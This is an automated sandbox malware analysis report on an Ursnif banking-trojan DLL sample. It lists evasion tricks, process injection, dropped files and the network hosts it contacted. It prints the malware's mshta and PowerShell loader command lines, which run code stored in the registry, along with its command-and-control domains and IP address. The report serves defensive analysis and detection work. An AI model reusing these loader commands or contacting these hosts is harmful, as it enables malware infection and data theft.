Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3508
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2272 Thread sleep time: -10145709240540247s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03139386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_03139386
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0312CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03140F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_03140F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05380F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_05380F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05379386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_05379386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_0536CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03126457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_03126457
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81D62 LoadLibraryA,GetProcAddress, 0_2_6DD81D62
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03133E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_03133E8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05373E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_05373E8D

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.228.233.17 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 2F0000 protect: page execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 2224 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 2F0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313FF06 cpuid 0_2_0313FF06
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6DD81813
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312C420 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0312C420
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6DD81983
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313FF06 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_0313FF06
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6DD81262
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458873 Sample: worVoBJYGD.dll Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 79 app.flashgameo.at 2->79 81 resolver1.opendns.com 2->81 91 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->91 93 Multi AV Scanner detection for domain / URL 2->93 95 Found malware configuration 2->95 97 6 other signatures 2->97 10 loaddll32.exe 2 1 2->10         started        14 mshta.exe 19 2->14         started        16 mshta.exe 19 2->16         started        signatures3 process4 dnsIp5 83 app.flashgameo.at 185.228.233.17, 49722, 49723, 49724 ITOS-ASRU Russian Federation 10->83 85 gtr.antoinfer.com 10->85 107 Writes to foreign memory regions 10->107 109 Allocates memory in foreign processes 10->109 111 Modifies the context of a thread in another process (thread injection) 10->111 115 3 other signatures 10->115 18 cmd.exe 1 10->18         started        20 rundll32.exe 10->20         started        23 control.exe 10->23         started        30 2 other processes 10->30 113 Suspicious powershell command line found 14->113 25 powershell.exe 1 32 14->25         started        28 powershell.exe 16->28         started        signatures6 process7 file8 32 rundll32.exe 18->32         started        99 System process connects to network (likely due to code injection or exploit) 20->99 101 Writes registry values via WMI 